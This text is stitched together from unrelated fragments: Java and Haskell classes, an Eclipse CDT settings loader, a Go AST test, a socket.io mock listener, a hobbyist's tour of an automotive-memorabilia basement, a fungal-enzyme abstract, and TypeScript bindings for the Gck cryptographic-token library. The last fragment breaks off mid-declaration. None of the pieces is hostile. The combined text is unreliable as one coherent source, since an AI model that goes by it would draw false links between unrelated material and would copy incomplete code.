/** * class Teacher extends Profession. * * @author Ruzhev Alexander * @since 29.03.2017 */ public class Teacher extends Profession { /** * Constructor extends Profession. * * @param name - name * @param age - age * @param employed - date employed * @param profession - profession teacher */ public Teacher(String name, int age, Date employed, String profession) { super(name, age, employed, profession); } /** * teach the student. * * @param student - object Engineer */ public void teach(Engineer student) { System.out.printf("Teacher %s teaches engineer %s", this.getName(), student.getName()); } /** * teach the student. * * @param student - object MedicalDoctor */ public void teach(MedicalDoctor student) { System.out.printf("Teacher %s teaches medical doctor %s", this.getName(), student.getName()); } /** * test job. */ public void testJob() { System.out.printf("Teacher %s checks the work of the group", this.getName()); } /** * give homework. */ public void toGiveHomework() { System.out.printf("Teacher %s gives homework group", this.getName()); } }
Hi there! C' mon in. You've been invited to take a tour through my top secret hide out filled with automotive memorabilia. Take a few moments and look around. There is much to see. I've been collecting all things automotive since I was a kid. I had always dreamed about creating a small retreat for myself where I could go and enjoy all of my automotive treasures, but I never really had space to display them all. In 1998 we finally purchased a house with a basement big enough to create my vision. The previous owner had started a basement remodel but lost interest in the project. Because the basement was not all finished it allowed me to move some walls around and really make it what I wanted. I've always admired the 1940's style gas station architecture and 1950's style diners, so I used those as my inspiration for designing the space. Over the course of 10 months about 500 sq. ft. of space was transformed into a display / rec. room, a work shop and play room for our kids. All the construction work was done by myself including laying the carpet and tile and building the bar. The bar is built from glass block and Corian®. I also constructed an entertainment center from some left over materials I had from the bar. On display is my 1500+ die-cast car collection of varying scales, model cars, automotive artwork, and racing memorabilia. Also, in the photos you'll notice the '90 1.6 Miata motor. I got the motor as a freebee from a friend who had to buy a replacement motor for his Miata. I brought it home, painted it and made the display base for it. Also pictured are my original Hot Wheel Redlines and Flying Colors, Matchbox, and Corgi's from when I was kid. I went pretty easy on them so most have survived in near mint condition. I also have over 500 packaged cars above in custom made racks I designed. I made the racks so that the packages could easily slide in and out. You will also see the models I have built over the past twenty years and numerous 1/24 scale die-cast and plastic promo cars I've collected. Also, below is a picture of a driver's suit and crew uniform. The uniforms are from the MOMO Ferrari 333sp / Doran racing team. This driver's suit was worn at the 1998 Rolex 24hrs race in which the MOMO team won. The suit is autographed by Max Papis ( one of the four drivers to compete in that car ) and was given to me by the Doran team in appreciation for the paint scheme design I did for them. The two end tables made from the custom wheels have two purposes. First they look cool in the basement and second it's a convenient way to store my MINI's summer wheels during the winter months. The center table is made from a real Indy car rain tire that I got from a friend. The last photos show my work shop. A little messy, but functional. I own about 500 or so kits that should keep my busy in my retirement years. Also I have a pretty decent research library, including a near complete Scale Auto Enthusiast collection and Hot Rod magazines back to the '70's. Well that's it. Thanks for stopping by!!!
module Main where import RAM import Instruction import RawInstruction import qualified Version1 as V1 import qualified Version2 as V2 import System.Environment import Types import qualified System.IO.Strict as S main :: IO () main = do ----------------------------------------------- --For building executable file enable this args <- getArgs rawInstructions <- readData (args!!0) version <- return $ (args!!1) debug <- if (length args == 3) then return $ Development else return $ Production --For running from "stack ghci" command enable this -- putStr "File: " -- file <- getLine -- rawInstructions <- readData $ "/src/" ++ file -- putStr "Version: " -- version <- getLine -- putStr "Debug: " -- debug <- fmap (\lst -> if length lst == 0 then Production else Development) getLine ----------------------------------------------- ram <- return $ startingRAM results <- case version of "1" -> return $ V1.loadInstructions debug ram rawInstructions "2" -> return $ V2.loadInstructions debug ram rawInstructions other -> error "version no adecuada" print $! results -- fmap (take 200) $
/** * Load language settings for workspace. */ public static void loadLanguageSettingsWorkspace() { try { Job.getJobManager().join(JOB_FAMILY_SERIALIZE_LANGUAGE_SETTINGS_WORKSPACE, null); } catch (OperationCanceledException e) { return; } catch (InterruptedException e) { CCorePlugin.log(e); Thread.currentThread().interrupt(); } List <ILanguageSettingsProvider> providers = null; URI uriStoreWsp = getStoreInWorkspaceArea(STORAGE_WORKSPACE_LANGUAGE_SETTINGS); Document doc = null; try { serializingLockWsp.acquire(); doc = XmlUtil.loadXml(uriStoreWsp); } catch (Exception e) { CCorePlugin.log("Can't load preferences from file " + uriStoreWsp, e); } finally { serializingLockWsp.release(); } if (doc != null) { Element rootElement = doc.getDocumentElement(); NodeList providerNodes = rootElement.getElementsByTagName(ELEM_PROVIDER); List<String> userDefinedProvidersIds = new ArrayList<String>(providerNodes.getLength()); providers = new ArrayList<ILanguageSettingsProvider>(providerNodes.getLength()); for (int i = 0; i < providerNodes.getLength(); i++) { Node providerNode = providerNodes.item(i); final String providerId = XmlUtil.determineAttributeValue(providerNode, ATTR_ID); if (userDefinedProvidersIds.contains(providerId)) { String msg = "Ignored an attempt to persist duplicate language settings provider, id=" + providerId; CCorePlugin.log(new Status(IStatus.WARNING, CCorePlugin.PLUGIN_ID, msg, new Exception())); continue; } userDefinedProvidersIds.add(providerId); ILanguageSettingsProvider provider = null; try { provider = loadProvider(providerNode); } catch (Exception e) { CCorePlugin.log("Error initializing workspace language settings providers", e); } if (provider == null) { provider = new NotAccessibleProvider(providerId); } providers.add(provider); } } setWorkspaceProvidersInternal(providers); }
package decorator import ( "bytes" "fmt" "path/filepath" "testing" "github.com/dave/dst" "github.com/dave/dst/decorator/resolver/guess" "github.com/dave/dst/dstutil" ) func TestApply(t *testing.T) { testPackageRestoresCorrectlyWithApplyClone( t, "github.com/dave/dst/gendst/data", "fmt", "bytes", "io", ) } func testPackageRestoresCorrectlyWithApplyClone(t *testing.T, path ...string) { t.Helper() pkgs, err := Load(nil, path...) if err != nil { t.Fatal(err) } for _, p := range pkgs { t.Run(p.PkgPath, func(t *testing.T) { r := NewRestorer() r.Path = p.PkgPath r.Resolver = &guess.RestorerResolver{} for _, file := range p.Syntax { fpath := p.Decorator.Filenames[file] _, fname := filepath.Split(fpath) t.Run(fname, func(t *testing.T) { cloned1 := dst.Clone(file).(*dst.File) cloned2 := dst.Clone(file).(*dst.File) cloned1 = dstutil.Apply(cloned1, func(c *dstutil.Cursor) bool { switch n := c.Node().(type) { case *dst.Ident: n1 := dst.Clone(c.Node()) n1.Decorations().End.Replace(fmt.Sprintf("/* %s */", n.Name)) c.Replace(n1) } return true }, nil).(*dst.File) // same with dst.Inspect dst.Inspect(cloned2, func(n dst.Node) bool { switch n := n.(type) { case *dst.Ident: n.Decorations().End.Replace(fmt.Sprintf("/* %s */", n.Name)) } return true }) buf1 := &bytes.Buffer{} if err := r.Fprint(buf1, cloned1); err != nil { t.Fatal(err) } buf2 := &bytes.Buffer{} if err := r.Fprint(buf2, cloned2); err != nil { t.Fatal(err) } if buf1.String() != buf2.String() { t.Errorf("diff:\n%s", diff(buf2.String(), buf1.String())) } }) } }) } }
Purification and Characterization of an Extracellular Acid Proteinase from the Ectomycorrhizal Fungus Hebeloma crustuliniforme Hebeloma crustuliniforme produced an extracellular acid proteinase in a liquid medium containing bovine serum albumin as the sole nitrogen source. The proteinase was purified 26-fold with 20% activity recovery and was shown to have a molecular weight of 37,800 (as indicated by sodium dodecyl sulfate-polyacrylamide gel electrophoresis) and an isoelectric point of 4.8 ± 0.2. The enzyme was most active at 50°C and pH 2.5 against bovine serum albumin and was stable in the absence of substrates at temperatures up to 45°C and pHs between 2.0 and 5.0. Pepstatin A, diazoacetyl-dl-norleucine methylester, metallic ions Fe2+ and Fe3+, and phenolic acids severely inhibited the enzyme activity, while antipain, leupeptin, N-α-p-tosyl-l-lysine chloromethyl ketone, and trypsin inhibitor inhibited the activity moderately. The proteinase hydrolyzed bovine serum albumin and cytochrome c rapidly compared with casein and azocasein but failed to hydrolyze any of the low-molecular-weight peptide derivatives tested.
import {Observe} from '@rxstack/async-event-dispatcher'; import {ServerConfigurationEvent, ServerEvents, ConnectionEvent} from '@rxstack/core'; import {Injectable, Injector} from 'injection-js'; import {socketMiddleware} from './socketio.middleware'; import {SocketioServer} from '../../src/socketio.server'; import {EventEmitter} from 'events'; @Injectable() export class MockEventListener { connectedUsers: EventEmitter[] = []; private injector: Injector; setInjector(injector: Injector): void { this.injector = injector; } @Observe(ServerEvents.CONFIGURE) async onConfigure(event: ServerConfigurationEvent): Promise<void> { if (event.server.getName() !== SocketioServer.serverName) { return; } event.server.getEngine() .use(socketMiddleware(this.injector)) ; } @Observe(ServerEvents.CONNECTED) async onConnect(event: ConnectionEvent): Promise<void> { if (event.server.getName() !== SocketioServer.serverName) { return; } this.connectedUsers.push(event.connection); event.server.getEngine().emit('hi', 'all'); } @Observe(ServerEvents.DISCONNECTED) async onDisconnect(event: ConnectionEvent): Promise<void> { if (event.server.getName() !== SocketioServer.serverName) { return; } let idx = this.connectedUsers.findIndex((current) => current === event.connection); if (idx !== -1) { this.connectedUsers.splice(idx, 1); } } }
/** * Gck 1 * * Generated from 1.0.0 */ import * as GObject from "@gi-types/gobject"; import * as Gio from "@gi-types/gio"; import * as GLib from "@gi-types/glib"; export const INVALID: number; export const MAJOR_VERSION: number; export const MICRO_VERSION: number; export const MINOR_VERSION: number; export const URI_FOR_MODULE_WITH_VERSION: number; export const URI_FOR_OBJECT_ON_TOKEN: number; export const URI_FOR_OBJECT_ON_TOKEN_AND_MODULE: number; export const VENDOR_CODE: number; export function builder_unref(builder?: any | null): void; export function error_get_quark(): GLib.Quark; export function list_get_boxed_type(): GObject.GType; export function message_from_rv(rv: number): string; export function modules_enumerate_objects( modules: Module[], attrs: Attributes, session_options: SessionOptions ): Enumerator; export function modules_enumerate_uri(modules: Module[], uri: string, session_options: SessionOptions): Enumerator; export function modules_get_slots(modules: Module[], token_present: boolean): Slot[]; export function modules_initialize_registered(cancellable?: Gio.Cancellable | null): Module[]; export function modules_initialize_registered_async(cancellable?: Gio.Cancellable | null): Promise<Module[]>; export function modules_initialize_registered_async( cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<Gio.Cancellable | null> | null ): void; export function modules_initialize_registered_async( cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<Gio.Cancellable | null> | null ): Promise<Module[]> | void; export function modules_initialize_registered_finish(result: Gio.AsyncResult): Module[]; export function modules_object_for_uri(modules: Module[], uri: string, session_options: SessionOptions): Object | null; export function modules_objects_for_uri(modules: Module[], uri: string, session_options: SessionOptions): Object[]; export function modules_token_for_uri(modules: Module[], uri: string): Slot; export function modules_tokens_for_uri(modules: Module[], uri: string): Slot[]; export function objects_from_handle_array(session: Session, object_handles: number[]): Object[]; export function slots_enumerate_objects(slots: Slot[], match: Attributes, options: SessionOptions): Enumerator; export function uri_build(uri_data: UriData, flags: UriFlags): string; export function uri_error_get_quark(): GLib.Quark; export function uri_parse(string: string, flags: UriFlags): UriData; export function value_to_boolean(value: Uint8Array | string, result: boolean): boolean; export function value_to_ulong(value: Uint8Array | string, result: number): boolean; export type Allocator = (data: any | null, length: number) => any | null; export namespace BuilderFlags { export const $gtype: GObject.GType<BuilderFlags>; } export enum BuilderFlags { NONE = 0, SECURE_MEMORY = 1, } export namespace Error { export const $gtype: GObject.GType<Error>; } export enum Error { PROBLEM = -951891199, } export namespace UriError { export const $gtype: GObject.GType<UriError>; } export enum UriError { BAD_SCHEME = 1, BAD_ENCODING = 2, BAD_SYNTAX = 3, BAD_VERSION = 4, NOT_FOUND = 5, } export namespace SessionOptions { export const $gtype: GObject.GType<SessionOptions>; } export enum SessionOptions { READ_ONLY = 0, READ_WRITE = 2, LOGIN_USER = 4, AUTHENTICATE = 8, } export namespace UriFlags { export const $gtype: GObject.GType<UriFlags>; } export enum UriFlags { FOR_OBJECT = 2, FOR_TOKEN = 4, FOR_MODULE = 8, WITH_VERSION = 16, FOR_ANY = 65535, } export module Enumerator { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; chained: Enumerator; interaction: Gio.TlsInteraction; } } export class Enumerator extends GObject.Object { static $gtype: GObject.GType<Enumerator>; constructor(properties?: Partial<Enumerator.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Enumerator.ConstructorProperties>, ...args: any[]): void; // Properties chained: Enumerator; interaction: Gio.TlsInteraction; // Members get_chained(): Enumerator | null; get_interaction(): Gio.TlsInteraction | null; get_object_type(): GObject.GType; next(cancellable?: Gio.Cancellable | null): Object | null; next_async(max_objects: number, cancellable?: Gio.Cancellable | null): Promise<Object[]>; next_async( max_objects: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; next_async( max_objects: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object[]> | void; next_finish(result: Gio.AsyncResult): Object[]; next_n(max_objects: number, cancellable?: Gio.Cancellable | null): Object[]; set_chained(chained?: Enumerator | null): void; set_interaction(interaction?: Gio.TlsInteraction | null): void; set_object_type(object_type: GObject.GType, attr_types: number[]): void; } export module Module { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; functions: any; path: string; } } export class Module extends GObject.Object { static $gtype: GObject.GType<Module>; constructor(properties?: Partial<Module.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Module.ConstructorProperties>, ...args: any[]): void; // Properties functions: any; path: string; // Signals connect(id: string, callback: (...args: any[]) => any): number; connect_after(id: string, callback: (...args: any[]) => any): number; emit(id: string, ...args: any[]): void; connect( signal: "authenticate-object", callback: (_source: this, object: Object, label: string, password: any | null) => boolean ): number; connect_after( signal: "authenticate-object", callback: (_source: this, object: Object, label: string, password: any | null) => boolean ): number; emit(signal: "authenticate-object", object: Object, label: string, password: any | null): void; connect( signal: "authenticate-slot", callback: (_source: this, slot: Slot, string: string, password: any | null) => boolean ): number; connect_after( signal: "authenticate-slot", callback: (_source: this, slot: Slot, string: string, password: any | null) => boolean ): number; emit(signal: "authenticate-slot", slot: Slot, string: string, password: any | null): void; // Members equal(module2: Module): boolean; get_info(): ModuleInfo; get_path(): string; get_slots(token_present: boolean): Slot[]; hash(): number; match(uri: UriData): boolean; vfunc_authenticate_object(object: Object, label: string, password: string): boolean; vfunc_authenticate_slot(slot: Slot, label: string, password: string): boolean; static initialize(path: string, cancellable?: Gio.Cancellable | null): Module; static initialize_async(path: string, cancellable?: Gio.Cancellable | null): Promise<Module | null>; static initialize_async( path: string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<Module> | null ): void; static initialize_async( path: string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<Module> | null ): Promise<Module | null> | void; static initialize_finish(result: Gio.AsyncResult): Module | null; } export module Object { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; handle: number; module: Module; session: Session; } } export class Object extends GObject.Object { static $gtype: GObject.GType<Object>; constructor(properties?: Partial<Object.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Object.ConstructorProperties>, ...args: any[]): void; // Properties handle: number; module: Module; session: Session; // Members cache_lookup(attr_types: number[], cancellable?: Gio.Cancellable | null): Attributes; cache_lookup_async(attr_types: number[], cancellable?: Gio.Cancellable | null): Promise<Attributes>; cache_lookup_async( attr_types: number[], cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; cache_lookup_async( attr_types: number[], cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Attributes> | void; cache_lookup_finish(result: Gio.AsyncResult): Attributes; destroy(cancellable?: Gio.Cancellable | null): boolean; destroy_async(cancellable?: Gio.Cancellable | null): Promise<boolean>; destroy_async(cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null): void; destroy_async( cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; destroy_finish(result: Gio.AsyncResult): boolean; equal(object2: Object): boolean; get_async(attr_types: number[], cancellable?: Gio.Cancellable | null): Promise<Attributes>; get_async( attr_types: number[], cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; get_async( attr_types: number[], cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Attributes> | void; get_data(attr_type: number, cancellable?: Gio.Cancellable | null): Uint8Array; get_data(...args: never[]): never; get_data_async(attr_type: number, allocator: Allocator, cancellable?: Gio.Cancellable | null): Promise<Uint8Array>; get_data_async( attr_type: number, allocator: Allocator, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; get_data_async( attr_type: number, allocator: Allocator, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; get_data_finish(result: Gio.AsyncResult): Uint8Array; get_finish(result: Gio.AsyncResult): Attributes; get_full(attr_types: number[], cancellable?: Gio.Cancellable | null): Attributes; get_handle(): number; get_module(): Module; get_session(): Session; get_template(attr_type: number, cancellable?: Gio.Cancellable | null): Attributes; get_template_async(attr_type: number, cancellable?: Gio.Cancellable | null): Promise<Attributes>; get_template_async( attr_type: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; get_template_async( attr_type: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Attributes> | void; get_template_finish(result: Gio.AsyncResult): Attributes; hash(): number; set(attrs: Attributes, cancellable?: Gio.Cancellable | null): boolean; set(...args: never[]): never; set_async(attrs: Attributes, cancellable?: Gio.Cancellable | null): Promise<boolean>; set_async( attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; set_async( attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; set_finish(result: Gio.AsyncResult): boolean; set_template(attr_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null): boolean; set_template_async(attr_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null): Promise<boolean>; set_template_async( attr_type: number, attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; set_template_async( attr_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; set_template_finish(result: Gio.AsyncResult): boolean; static from_handle(session: Session, object_handle: number): Object; } export module Password { export interface ConstructorProperties extends Gio.TlsPassword.ConstructorProperties { [key: string]: any; key: Object; module: Module; token: Slot; } } export class Password extends Gio.TlsPassword { static $gtype: GObject.GType<Password>; constructor(properties?: Partial<Password.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Password.ConstructorProperties>, ...args: any[]): void; // Properties key: Object; module: Module; token: Slot; // Members get_key(): Object; get_module(): Module; get_token(): Slot; } export module Session { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; app_data: any; appData: any; handle: number; interaction: Gio.TlsInteraction; module: Module; opening_flags: number; openingFlags: number; options: SessionOptions; slot: Slot; } } export class Session extends GObject.Object implements Gio.AsyncInitable<Session>, Gio.Initable { static $gtype: GObject.GType<Session>; constructor(properties?: Partial<Session.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Session.ConstructorProperties>, ...args: any[]): void; // Properties app_data: any; appData: any; handle: number; interaction: Gio.TlsInteraction; module: Module; opening_flags: number; openingFlags: number; options: SessionOptions; slot: Slot; // Signals connect(id: string, callback: (...args: any[]) => any): number; connect_after(id: string, callback: (...args: any[]) => any): number; emit(id: string, ...args: any[]): void; connect(signal: "discard-handle", callback: (_source: this, handle: number) => boolean): number; connect_after(signal: "discard-handle", callback: (_source: this, handle: number) => boolean): number; emit(signal: "discard-handle", handle: number): void; // Members create_object(attrs: Attributes, cancellable?: Gio.Cancellable | null): Object; create_object_async(attrs: Attributes, cancellable?: Gio.Cancellable | null): Promise<Object>; create_object_async( attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; create_object_async( attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object> | void; create_object_finish(result: Gio.AsyncResult): Object; decrypt( key: Object, mech_type: number, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; decrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; decrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; decrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; decrypt_finish(result: Gio.AsyncResult): Uint8Array; decrypt_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; derive_key(base: Object, mech_type: number, attrs: Attributes, cancellable?: Gio.Cancellable | null): Object; derive_key_async( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Promise<Object>; derive_key_async( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; derive_key_async( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object> | void; derive_key_finish(result: Gio.AsyncResult): Object; derive_key_full( base: Object, mechanism: Mechanism, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Object; encrypt( key: Object, mech_type: number, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; encrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; encrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; encrypt_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; encrypt_finish(result: Gio.AsyncResult): Uint8Array; encrypt_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Uint8Array; enumerate_objects(match: Attributes): Enumerator; find_handles(match: Attributes, cancellable?: Gio.Cancellable | null): number[] | null; find_handles_async(match: Attributes, cancellable?: Gio.Cancellable | null): Promise<number[] | null>; find_handles_async( match: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; find_handles_async( match: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<number[] | null> | void; find_handles_finish(result: Gio.AsyncResult): number[] | null; find_objects(match: Attributes, cancellable?: Gio.Cancellable | null): Object[]; find_objects_async(match: Attributes, cancellable?: Gio.Cancellable | null): Promise<Object[]>; find_objects_async( match: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; find_objects_async( match: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object[]> | void; find_objects_finish(result: Gio.AsyncResult): Object[]; generate_key_pair( mech_type: number, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null ): [boolean, Object | null, Object | null]; generate_key_pair_async( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null ): Promise<[Object | null, Object | null]>; generate_key_pair_async( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; generate_key_pair_async( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<[Object | null, Object | null]> | void; generate_key_pair_finish(result: Gio.AsyncResult): [boolean, Object | null, Object | null]; generate_key_pair_full( mechanism: Mechanism, public_attrs: Attributes, private_attrs: Attributes, cancellable?: Gio.Cancellable | null ): [boolean, Object | null, Object | null]; get_handle(): number; get_info(): SessionInfo; get_interaction(): Gio.TlsInteraction | null; get_module(): Module; get_options(): SessionOptions; get_slot(): Slot; get_state(): number; init_pin(pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): boolean; init_pin_async(pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): Promise<boolean>; init_pin_async( pin: Uint8Array | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; init_pin_async( pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; init_pin_finish(result: Gio.AsyncResult): boolean; login(user_type: number, pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): boolean; login_async(user_type: number, pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): Promise<boolean>; login_async( user_type: number, pin: Uint8Array | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; login_async( user_type: number, pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; login_finish(result: Gio.AsyncResult): boolean; login_interactive( user_type: number, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): boolean; login_interactive_async( user_type: number, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): Promise<boolean>; login_interactive_async( user_type: number, interaction: Gio.TlsInteraction | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; login_interactive_async( user_type: number, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; login_interactive_finish(result: Gio.AsyncResult): boolean; logout(cancellable?: Gio.Cancellable | null): boolean; logout_async(cancellable?: Gio.Cancellable | null): Promise<boolean>; logout_async(cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null): void; logout_async( cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; logout_finish(result: Gio.AsyncResult): boolean; set_interaction(interaction?: Gio.TlsInteraction | null): void; set_pin(old_pin?: Uint8Array | null, new_pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null): boolean; set_pin_async( old_pin: Uint8Array | null, n_old_pin: number, new_pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null ): Promise<boolean>; set_pin_async( old_pin: Uint8Array | null, n_old_pin: number, new_pin: Uint8Array | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; set_pin_async( old_pin: Uint8Array | null, n_old_pin: number, new_pin?: Uint8Array | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; set_pin_finish(result: Gio.AsyncResult): boolean; sign(key: Object, mech_type: number, input: Uint8Array | string, cancellable?: Gio.Cancellable | null): Uint8Array; sign_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; sign_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; sign_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; sign_finish(result: Gio.AsyncResult): Uint8Array; sign_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, n_result: number, cancellable?: Gio.Cancellable | null ): number; unwrap_key( wrapper: Object, mech_type: number, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Object; unwrap_key_async( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Promise<Object>; unwrap_key_async( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; unwrap_key_async( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Object> | void; unwrap_key_finish(result: Gio.AsyncResult): Object; unwrap_key_full( wrapper: Object, mechanism: Mechanism, input: Uint8Array | string, attrs: Attributes, cancellable?: Gio.Cancellable | null ): Object; verify( key: Object, mech_type: number, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null ): boolean; verify_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null ): Promise<boolean>; verify_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; verify_async( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; verify_finish(result: Gio.AsyncResult): boolean; verify_full( key: Object, mechanism: Mechanism, input: Uint8Array | string, signature: Uint8Array | string, cancellable?: Gio.Cancellable | null ): boolean; wrap_key(wrapper: Object, mech_type: number, wrapped: Object, cancellable?: Gio.Cancellable | null): Uint8Array; wrap_key_async( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable?: Gio.Cancellable | null ): Promise<Uint8Array>; wrap_key_async( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; wrap_key_async( wrapper: Object, mechanism: Mechanism, wrapped: Object, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Uint8Array> | void; wrap_key_finish(result: Gio.AsyncResult): Uint8Array; wrap_key_full( wrapper: 